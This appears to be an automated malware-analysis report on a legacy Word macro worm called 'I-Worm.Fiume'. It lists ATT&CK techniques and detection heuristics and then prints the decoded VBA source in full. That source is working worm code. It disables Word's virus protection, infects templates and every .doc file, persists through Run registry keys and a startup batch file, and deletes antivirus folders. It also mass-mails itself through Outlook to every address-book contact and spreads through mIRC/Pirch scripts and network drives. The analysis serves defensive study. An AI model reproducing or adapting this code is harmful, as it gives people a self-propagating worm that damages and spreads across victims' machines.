MALICIOUS (Risk Score: 676)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
- T1059.003 Windows Command Shell
- T1204.002 Malicious File
The sample contains a legacy WordBasic macro that is obfuscated and designed to execute automatically. It attempts to create a batch file named 'msfile.bat' in the startup folder, which would allow it to persist and likely download additional malicious content. The macro also uses WScript.Shell and CreateObject, indicating it can execute arbitrary commands.
Heuristics (14)
- ClamAV: Win.Worm.Godog-4 [critical] CLAMAV_DETECTION
  ClamAV detected this file as malware: Win.Worm.Godog-4
- VBA macros detected [medium, 10 related findings] OLE_VBA_MACROS
  Document contains VBA macro code
- Potential Shell call in VBA [critical] OLE_VBA_SHELL
  Matched line in script:
  If ViAq911477846 = True And ClQe77842 = False Then Shell ("label c: Fiume"), 0
- WScript.Shell usage [critical] OLE_VBA_WSCRIPT
  Matched line in script:
  Set ws = CreateObject("WScript.Shell")
- LOLBin reference in VBA [critical] OLE_VBA_LOLBIN
  Matched line in script:
  ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\Worm.vbs %"
- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script:
  If ViAq911477846 = True And ClQe77842 = False Then Shell ("label c: Fiume"), 0
- VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
  VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script:
  Options.VirusProtection = False
- VBA email-worm self-replication (Outlook mass-mailer) [critical] OLE_VBA_EMAIL_WORM_SELF_REPLICATION
  VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, harvests recipients from the MAPI address book / inbox, and sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage; there is no benign document use, independent of any AV signature.
  Matched line in script:
  Set Msg = Outlook.CreateItem(0)
- CreateObject call [high] OLE_VBA_CREATEOBJ
  Matched line in script:
  Set fso = CreateObject("scripting.filesystemobject")
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro [low] OLE_VBA_AUTOOPEN
  Matched line in script:
  Sub AutoOpen()
- Auto_Close macro [low] OLE_VBA_AUTOCLOSE
  Matched line in script:
  Sub AutoClose()
- Reference to Windows Script Host [high] SC_STR_WSCRIPT
- Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
  OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25189 bytes |

SHA-256: cb3bbf8230e4d490d29d3fe97f83334e5378d5606343a7ce1359000ce4df0973
Detection (ClamAV): Doc.Trojan.Vmpc-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "fiume"
Sub IWormFiume()
On Error Resume Next
Randomize
sv = Int(Rnd * 3) + 1
If sv = 1 Then svt$ = "porno.doc"
If sv = 3 Then svt$ = "readme!.doc"
If sv = 2 Then svt$ = "sex.doc"
HfRu11459 = GmIvSwGg & PzPe7718 & Int(Rnd * 666)
SzQp4578 = JpBhAxGf & NfGi8478 & Int(Rnd * 2898)
ClVeKfKf = GrHh7292 & LuPp4757
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
ActiveDocument.VBProject.VBComponents("I-Worm.Fiume").Export "c:\I-Worm.Fiume.drv"
GkSr7495 = LrQuMjNj & SgQw14098 & Int(Rnd * 7050)
KtQfKlQe = HuMz9434 & DvTm8543
GrVx5948 = CwHnIoSq & RnDr2790 & Int(Rnd * 1489)
ActiveDocument.ReadOnlyRecommended = False
HxJj18767 = CqPtPsIs & LsIo10464 & Int(Rnd * 1459)
MrKn8684 = SwMmCtNx & SgTp11704 & Int(Rnd * 8055)
HmBsJsBf = CwEy6581 & JsOh15826
GqQoPeIf = OkIh8802 & QsEv12537
NnNkVyQg = AvKu16107 & HuPp8281
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Dr.Bobo"
.Title = "Fiume"
.Subject = "I-Worm.Fiume"
.Keywords = "bobo_dr"
.Execute
End With
VtRu5838 = MpGmVyNi & GhGz5888 & GhHfShKy & MsKu8711
LpIq4025$ = "c:\windows\startm~1\programs\startup\msfile.bat"
FuOrSvBl = SgSw16997 & GyVi14886
FsRf88049114 = GetAttr(NormalTemplate.FullName)
NyMw5713 = CePsCfLt & EyFf15059 & Int(Rnd * 1009)
If FsRf88049114 = vbReadOnly And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(LpIq4025$)
NyOw2641 = IsHfRgMg & EuAv15845 & PkFxJtFl & CoDi15805
PxNw6224 = BhEoExPs & TiMs2473 & NhUlJqLv & DuDx7034
If FsRf88049114 = vbReadOnly + vbArchive And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(LpIq4025$)
If FsRf88049114 = vbReadOnly Then GoTo IuGnCnAk
If FsRf88049114 = vbReadOnly + vbArchive Then GoTo IuGnCnAk
DqSo8091 = QoHyFeMz & EyLn10271 & Int(Rnd * 4126)
JyBq8914 = JlCsBzJr & AzUt9841 & Int(Rnd * 2288)
CvDkBpSu = RkJf5759 & SpKe12537
If NormalTemplate.VBProject.VBComponents.Item("I-Worm.Fiume").Name <> "I-Worm.Fiume" Then ViAq911477846 = True
DxCv13472 = MmNzQkSt & EfPy9748 & BiRzRvBh & LiMz1826
If ActiveDocument.VBProject.VBComponents.Item("I-Worm.Fiume").Name <> "I-Worm.Fiume" Then ClQe77842 = True
IhAh10804 = TfFyOuFt & MyRu10813 & Int(Rnd * 5069)
UhCm8197 = PgBmNoJt & IgKi17464 & Int(Rnd * 6247)
If ViAq911477846 = True And ClQe77842 = False Then Set CtHn778491149 = NormalTemplate.VBProject.VBComponents
If ViAq911477846 = False And ClQe77842 = True Then Set CtHn778491149 = ActiveDocument.VBProject.VBComponents
CtHn778491149.import "c:\I-Worm.Fiume.drv"
If ViAq911477846 = True And ClQe77842 = False Then Shell ("label c: Fiume"), 0
If ViAq911477846 = False And Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
TfVy13923 = AiUkSvFs & KfIy11573 & SuInHzIl & QzAr11676
PfAq9412 = FzQuVqTy & ExAq13213 & GjPgMvVk & IvAk14213
BlGj13399 = JuLrSsSx & SxIy15089 & Int(Rnd * 7728)
TgByIkSy = KpPp13390 & SfRh5648
If ClQe77842 = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
OvVoOhJs = VrAi5749 & UiKy8992
KnUo4490 = MfNjIwEr & NnTm10010 & Int(Rnd * 3485)
KpDlJoIh = KhGe6584 & PuBf17110
LyFr14561 = EoRtBpPr & HgOz9699 & Int(Rnd * 3900)
Call dhIconDisco("C:\autorun.inf")
VrCoCpGh = VeUj4678 & DtSp12098
IuGnCnAk:
End Sub
Sub FileNew()
On Error Resume Next
Call fiume
IsSh13165 = KxTwMjLe & FmKm7360 & QxIyLhFp & FiTt5184
Dialogs(wdDialogFileNew).Show
UgLxVfUy = MkCp3628 & SkSx17032
BvTi11903 = LjSuHgVm & KuMf10066 & HtMoVoVn & MiGt4542
Skip = 1
GtTi9582 = RmAmDoIo & MyVo10732 & RfOoLkAe & EySe13954
Call fiume
TvBw14319 = AsGqDyPf & FmVo12491 & Int(Rnd * 6679)
End Sub
Sub FileSave()
On Error Resume Next
IvBlTyAj = DjMq9288 & IrSp10975
EhUuGyAg = OxQr12056 & OuIn10320
Call fiume
MzTx11058 = TqTeEqGp & LzFf17207 & Int(Rnd * 9188)
ActiveDocument.Save
RrJx16843 = FvAqDiJs & JtFe11933 & Int(Rnd * 9957)
FjEm10998 = SpNnJiAl & OiDv6590 & Int(Rnd * 1762)
End Sub
Sub FileClose()
On Error Resume Next
MkDh16439 = PoCgPxNj & KgJq6684 & Int(Rnd * 6611)
DhMhQsDe = TqPz7129 & PsAy7135
Call fiume
LzNgIpDp = BoJf6535 & TqLx3012
IfMy8100 = RfViCjJg & RtGx9634 & Int(Rnd * 742)
If ActiveDocument.Saved = False Then ActiveDocument.Save
DfIn9731 = KpLwSyVq & KyIg9703 & Int(Rnd * 8749)
BoGnDsNq = JsJm13997 & SrPh14603
ActiveDocument.Close
JxBoDyTq = KvOi6140 & KrUe8389
End Sub
Sub ToolsOptions()
On Error Resume Next
HkOu9207 = UfBhSwMv & TuIg13218 & Int(Rnd * 8540)
JrCg12028 = VuKnDzBx & MzNz10893 & Int(Rnd * 8510)
Dialogs(wdDialogToolsOptions).Show
KeTeNkMf = HvFq4673 & GyNl14264
GpIfDiEr = FxGh3287 & QoPv15673
Call fiume
PwRmTxRv = GrNg4665 & EtFx10271
VqTz7344 = IlJwCsAg & MuPo15284 & Int(Rnd * 9349)
End Sub
Sub EditFind()
On Error Resume Next
CnMhOgEm = KwHs16298 & AkKl9853
Dialogs(wdDialogEditFind).Show
JgNf14151 = NvMeGzLh & TzHt4836 & CgIpLjRq & HkUr9332
Call fiume
HvGt8260 = SuSgOwAo & EqSr17946 & Int(Rnd * 9201)
EnGx5374 = IsCuFiOf & FyOf10062 & Int(Rnd * 3721)
End Sub
Sub FileSaveAs()
On Error Resume Next
QvOo8148 = AqDjPjDv & AjLe16190 & HsMkUmRr & VvTo9572
DjEf10682 = MhDlCwJv & KnBy9849 & BnBuUjFh & TmOe16200
Dialogs(wdDialogFileSaveAs).Show
QvRo15075 = GiRsJkEi & AeGu6976 & Int(Rnd * 6719)
SuQo8659 = UtOfRfHu & QpSs3603 & Int(Rnd * 240)
Call fiume
End Sub
Sub FilePrint()
On Error Resume Next
InFk9886 = DxGkCnAv & KgBm8422 & Int(Rnd * 3314)
PiTf15370 = FhOfKgSj & KlFq15322 & SeLxKuNk & HgAo13672
Dialogs(wdDialogFilePrint).Show
GnVg10526 = NeRpSiDf & AiRm1402 & LzByUiBt & MwKw11802
UsFi9537 = LiEvNlOt & NtTt9051 & NrKeMeBo & SqSy11385
Call fiume
TxNg14501 = EpNpQeTj & QmKm4207 & Int(Rnd * 6984)
RvRkTjBh = RzHj15804 & IjUx10481
End Sub
Sub FileExit()
On Error Resume Next
KnSxVsKx = CpSy7687 & KzKj11054
QeEkUoQi = MvAv8746 & BkQf5729
Call fiume
If ActiveDocument.Saved = False Then ActiveDocument.Save
KuVv8419 = BuSuKpVq & GvMf11248 & Int(Rnd * 3458)
GuAm3907 = GpOhNkNw & ArEu12888 & Int(Rnd * 7097)
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call fiume
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call fiume
End If
Loop
ChangeFileOpenDirectory "p:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "h:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "f:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
Application.Quit
GwBw11252 = PuCxPzQo & UxKk7995 & Int(Rnd * 1904)
End Sub
Sub AutoOpen()
On Error Resume Next
NeGg7895 = KkIfKmMv & OsMg14764 & OsTvFwOw & QyCj12687
Call fiume
JwUyCmLw = NzTs5859 & OsKf6355
End Sub
Sub AutoExit()
On Error Resume Next
Call fiume
IhRzPeAp = UiGf7899 & DlOz2777
LpHx8174 = MfPvBxGt & LeIs9187 & Int(Rnd * 5798)
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call fiume
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call fiume
End If
Loop
If ActiveDocument.Saved = False Then ActiveDocument.Save
ChangeFileOpenDirectory "p:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "r:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "s:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
End Sub
Sub AutoExec()
On Error Resume Next
IeSt10663 = PwHgNlLm & BkLs11300 & Int(Rnd * 9318)
EwDq12244 = UfDkPxCr & BeSo5085 & Int(Rnd * 4200)
Call fiume
VwIkFlKt = HtBx7199 & GmAj16065
End Sub
Sub AutoClose()
On Error Resume Next
BvQxRsHv = CeBp12125 & EoHu9252
Call fiume
TmUe4077 = SyUwRiCm & ItCs10407 & Int(Rnd * 3903)
End Sub
Sub ToolsMacro()
On Error Resume Next
KvClGgUv = BiUz9826 & EoLl9617
KvNlTsLp = DhHs5991 & ArNh1215
Call fiume
JqMyCzGo = SmCw8843 & RpQz11318
UtTo14241 = RsTyUfGj & IsDt18218 & Int(Rnd * 9831)
PwVp3493 = QhHsRuUr & HkLe18337 & Int(Rnd * 501)
HyDwKhGt = MsQu9261 & OvBf10378
MsgBox "Word Basic Err =7"
OxKqOpOq = LhCh11312 & HsMq9020
KgKhSmFm = LfFf13680 & RnJh9360
End Sub
Sub FileTemplates()
On Error Resume Next
PiFv8874 = NfMtHfFl & HnPp7814 & OkCjIvTz & FgFf7378
TqBt3408 = KnEkEvEw & OuBf9577 & Int(Rnd * 1158)
Call fiume
ItFl4563 = AiOfRoHx & OuLi14709 & GqCwExCu & UtTe613
RiOkCvEf = KsHe6273 & AeTo6253
UsEh7681 = DlHnVpHw & MwCm5469 & Int(Rnd * 2523)
MtEu9075 = RoRrOtPr & UyTp3070 & SfRhVeLv & GwTl8076
MsgBox "Word Basic Err =7"
BmJzHmFz = EzIe11267 & JyEh10143
FpGiCjJe = MzDo16587 & RzDq17949
End Sub
Sub ViewVBCode()
On Error Resume Next
HfFmRrIz = EsGu11424 & RxSt5992
CtJgGyKh = IsJx5407 & KnIl6697
Call fiume
OeCvMoUk = JsQl11369 & LpGp10118
MsgBox "Word Basic Err =7"
ApCrFvPs = JyJq16634 & OyNl9439
End Sub
Sub KillAV()
On Error Resume Next
Kill "C:\Program Files\AntiViral Toolkit Pro\*.*"
Kill "C:\eSafe\Protect\*.*"
Kill "C:\Program Files\Command Software\F-PROT\*.*"
Kill "C:\Program Files\Command Software\F-PROT95\*.*"
Kill "C:\Program Files\Command Software\F-PROT98\*.*"
Kill "C:\Program Files\Command Software\F-PROT 2000\*.*"
Kill "C:\Program Files\Command Software\F-PROT 2001\*.*"
Kill "C:\PC-Cillin\*.*"
Kill "C:\PC-Cillin 95\*.*"
Kill "C:\PC-Cillin 97\*.*"
Kill "C:\PC-Cillin 2000\*.*"
Kill "C:\PC-Cillin 2001\*.*"
Kill "C:\Program Files\Quick Heal\*.*"
Kill "C:\Program Files\FWIN32"
Kill "C:\Program Files\FindVirus\*.*"
Kill "C:\Toolkit\FindVirus\*.*"
Kill "C:\f-macro\*.*"
Kill "C:\Program Files\McAfee\VirusScan\*.*"
Kill "C:\Program Files\McAfee\VirusScan95\*.*"
Kill "C:\Program Files\McAfee\VirusScan98\*.*"
Kill "C:\Program Files\McAfee\VirusScan 2000\*.*"
Kill "C:\Program Files\McAfee\VirusScan 2001\*.*"
Kill "C:\Program Files\Norton AntiVirus\*.*"
Kill "C:\TBAVW\*.*"
Kill "C:\TBAVW95\*.*"
Kill "C:\TBAVW98\*.*"
Kill "C:\TBAVW 2000\*.*"
Kill "C:\TBAVW 2001\*.*"
Kill "C:\VS\*.*"
Kill "C:\VS95\*.*"
Kill "C:\VS98\*.*"
Kill "C:\VS 2000\*.*"
Kill "C:\VS 2001\*.*"
End Sub
Function Antidelete()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.CreateTextFile(wscript.scriptfullname, True)
Myself.Write MyCode
Myself.Close
End If
Loop
End Function
Function Dodrives()
On Error Resume Next
Set fso = CreateObject("scipting.filesystemobject")
Set Drives = fso.Drives
For Each Drive In Drives
If Drive.Drivetype = Remote Then
Drivefull = Drive & "\"
Call Subfolders(Drivefull)
ElseIf Drive.IsReady Then
Drivefull = Drive & "\"
Call Subfolders(Drivefull)
End If
Next
End Function
Function Run()
On Error Resume Next
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\Worm.vbs %"
Next
End Function
Function Subfolders(path)
On Error Resume Next
newpath = path
Set Fold = fso.GetFolder(newpath)
Set Files = Fold.Files
For Each file In Files
If fso.GetExtensionName(file.path) = "doc" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If fso.GetExtensionName(file.path) = "dot" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If file.Name = "mirc.ini" Then
Mirc (file.ParentFolder)
End If
If file.Name = "Pirch32.exe" Then
Pirch (file.ParentFolder)
End If
Next
Set file = Fold.Subfolders
For Each Subfol In file
Call Subfolders(Subfol.path)
Next
End Function
Function OutlookBody()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
I = 1
Do While Myself.atendofstream = False
MyLine = Myself.readline
Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) & "&chr(34)&" & Chr(34))
Loop
Myself.Close
htm = "<" & "HTML><" & "HEAD><" & "META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html; charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><" & "META content=" & Chr(34) & "MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><" & "STYLE></" & "STYLE></" & "HEAD><" & "BODY bgColor=#ffffff><" & "SCRIPT language=vbscript>"
htm = htm & vbCrLf & "On Error Resume Next"
htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "scripting.filesystemobject" & Chr(34) & ")"
htm = htm & vbCrLf & "If Err.Number <> 0 Then"
htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000 size='2'>You need ActiveX enabled if you want to see this e-mail.<br>Please open this message again and click accept ActiveX<br>Microsoft Outlook</font>" & Chr(34) & ""
htm = htm & vbCrLf & "Else"
htm = htm & vbCrLf & "Set vbs = fso.createtextfile(fso.getspecialfolder(0) & " & Chr(34) & "\Worm.vbs" & Chr(34) & ", True)"
htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34)
htm = htm & vbCrLf & "vbs.Close"
htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")"
htm = htm & vbCrLf & "ws.run fso.getspecialfolder(0) & " & Chr(34) & "\wscript.exe " & Chr(34) & " & fso.getspecialfolder(0) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "This message has permanent errors.<br>Sorry<br>" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "End If"
htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>"
HtmlBody = htm & htm2
Set mapi = Outlook.GetNameSpace("MAPI")
Set Mapiadd = mapi.AddressLists
For Each Addresslist In Mapiadd
If Addresslist.AddressEntries.Count <> 0 Then
AddCount = Addresslist.AddressEntries.Count
Set Msg = Outlook.CreateItem(0)
Msg.Subject = "Re: 4You"
Msg.HtmlBody = HtmlBody
Msg.DeleteAfterSubmit = True
For II = 1 To AddCount
Set Addentry = Addresslist.AddressEntries(II)
If AddCount = 1 Then
Msg.BCC = Addentry.Address
Else
Msg.BCC = Msg.BCC & "; " & Addentry.Address
End If
Next
Msg.Send
End If
Next
Outlook.Quit
End If
Next
End Function
Function Mirc(path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If path = "" Then
If fso.fileexists("c:\mirc\mirc.ini") Then path = "c:\mirc"
If fso.fileexists("c:\mirc32\mirc.ini") Then path = "c:\mirc32"
pfDir = ws.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If fso.fileexists(pfDir & "\mirc\mirc.ini") Then path = pfDir & "\mirc"
End If
If path <> "" Then
Set Script = fso.CreateTextFile(path & "\script.ini", True)
Script.WriteLine "[script]"
Script.WriteLine "n0=on 1:JOIN:#:{"
Script.WriteLine "n1= /if ( $nick == $me ) { halt }"
Script.WriteLine "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick c:\windows\worm.vbs"
Script.WriteLine "n3=}"
Script.Close
End If
Next
End Function
Function Pirch(path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If path = "" Then
If fso.fileexists("c:\pirch\Pirch32.exe") Then path = "c:\pirch"
If fso.fileexists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32"
pfDir = ws.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If fso.fileexists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
End If
If path <> "" Then
Set Script = fso.CreateTextFile(path & "\events.ini", True)
Script.WriteLine "[Levels]"
Script.WriteLine "Enabled=1"
Script.WriteLine "Count=6"
Script.WriteLine "Level1=000-Unknowns"
Script.WriteLine "000-UnknownsEnabled=1"
Script.WriteLine "Level2=100-Level 100"
Script.WriteLine "100-Level 100Enabled=1"
Script.WriteLine "Level3=200-Level 200"
Script.WriteLine "200-Level 200Enabled=1"
Script.WriteLine "Level4=300-Level 300"
Script.WriteLine " 300-Level 300Enabled=1"
Script.WriteLine "Level5=400-Level 400 "
Script.WriteLine "400-Level 400Enabled=1"
Script.WriteLine "Level6=500-Level 500"
Script.WriteLine "500-Level 500Enabled=1"
Script.WriteLine ""
Script.WriteLine "[000-Unknowns]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[100-Level 100]"
Script.WriteLine "User1=*!*@*"
Script.WriteLine "UserCount=1"
Script.WriteLine "Event1=ON JOIN:#:/" & Chr(100) & Chr(99) & Chr(99) & " tsend $nick c:\windows\worm.vbs"
Script.WriteLine "EventCount=1"
Script.WriteLine ""
Script.WriteLine "[200-Level 200]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[300-Level 300]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[400-Level 400]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[500-Level 500]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.Close
End If
Next
End Function
Sub Worm()
On Error Resume Next
Dim A01
Dim A02
Dim A03
Dim A04
Dim A08
Dim A06
Dim A07
Dim A05
Dim A09
Dim A10
Set A01 = CreateObject("Scripting.FileSystemObject")
A01.copyfile wscript.scriptfullname, A01.BuildPath(A01.GetSpecialFolder(1), "WORM.VBS")
Set A02 = CreateObject("WScript.Shell")
A02.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & "Fiume", A01.BuildPath(A01.GetSpecialFolder(1), "WORM.VBS")
Set A03 = CreateObject("WScript.Network")
Set A08 = A03.EnumNetworkDrives
If A08.Count <> 0 Then
For A04 = 0 To A08.Count - 1
If InStr(A08.Item(A04), "\") <> 0 Then
A01.copyfile wscript.scriptfullname, A01.BuildPath(A08.Item(A04), "WORM.VBS")
End If
Next
End If
A04 = A02.RegRead("HKEY_LOCAL_MACHINE\" & "WORM")
If A04 = "" Or A04 > 20 Then
A04 = 0
End If
If A04 = 0 Then
Set A05 = CreateObject("Outlook.Application")
Set A06 = A05.GetNameSpace("MAPI")
For Each A07 In A06.AddressLists
Set A08 = A05.CreateItem(0)
For A09 = 1 To A07.AddressEntries.Count
Set A10 = A07.AddressEntries(A09)
If A09 = 1 Then
A08.BCC = A10.Address
Else
A08.BCC = A08.BCC & "; " & A10.Address
End If
Next
A08.Subject = "Fiume [Croatia]"
A08.Body = "Welcom to Fiume a town in Croatia. Attachment is a photo of Fiume."
A08.Attachmets.Add wscript.scriptfullname
A08.DeleteAfterSubmit = True
A08.Send
Next
A04 = 0
End If
A02.regwrite "HKEY_LOCAL_MACHINE\" & "WORM", A04 + 1
End If
Next
End Function
Sub vBitchES(strFile As String)
Dim hFile As Long
On Error Resume Next
n$ = NormalTemplate
DzFx9222 = EuOjSgNm & EwTi7185 & Int(Rnd * 2775)
OxTs13413 = TvGvLxPz & BnUo9171 & Int(Rnd * 3822)
Part11$ = "attrib -h -r "
LhMjVjFg = DoFx11195 & BrBi14214
IuLhIrUn = OqMl14555 & OyDo18522
snag$ = "c:\progra~1\micros~1\templa~1\"
BoGrGpRt = IiGp14814 & DjSz11735
ApQtTyNl = VqAm13912 & UxEt2910
snag1$ = "c:\progra~1\micros~2\templa~1\"
UmJiSvTv = AwAe5143 & CmKs15650
RtUrUgLn = NuJu12255 & OyGf8889
Part2$ = "del "
PzBg7686 = MsJxGrTe & VoAu5063 & OlOnCeOl & KyVu3992
NfOk8744 = EnRnIeBp & IeGr12362 & Int(Rnd * 3643)
hFile = FreeFile
Open strFile For Output Access Write As hFile
Print #hFile, "@echo off"
Print #hFile, Part11$ + snag$ + n$
Print #hFile, Part11$ + snag1$ + n$
Print #hFile, Part2$ + snag$ + n$
Print #hFile, Part2$ + snag1$ + n$
Print #hFile, "cls"
Print #hFile, Part2$ + "c:\windows\startm~1\programs\startup\msfile.bat"
Close hFile
LzFwGoNk = BsBl10417 & LtBt4581
NrOxTlNe = GmKn10000 & OnQs5520
End Sub
Sub dhIconDisco(strFile As String)
Dim hFile As Long
On Error Resume Next
Randomize
DeQg8791 = NiCiFgDx & HyOp13907 & KgIfOtRz & SmHp10236
Choice = Int(Rnd * 2)
MxIm10197 = TrLjSrPn & NxDe580 & InGvFeJh & IlJg9932
OeOiDxPp = RrNz10992 & RyAk9489
rnn$ = Int(Rnd * 66) + 2
OmRrKrCn = ReTf14951 & AgTu15756
MqSg15951 = MwPqPqSw & GiTx7569 & NpVqSpIr & QoSn12426
rn$ = Int(Rnd * 27) + 1
GyLtMwRr = DvJm8063 & GlOf9072
HoQj17165 = CtJxBrHf & CyJj13317 & Int(Rnd * 4149)
Part1$ = "[autorun]"
PmSt12701 = QjMgCoAt & RsJw6504 & JjCtMgFs & BkIf5606
CvNoRzNq = SvOx12741 & UkPt11265
Part2$ = "icon = c:\windows\system\pifmgr.dll,"
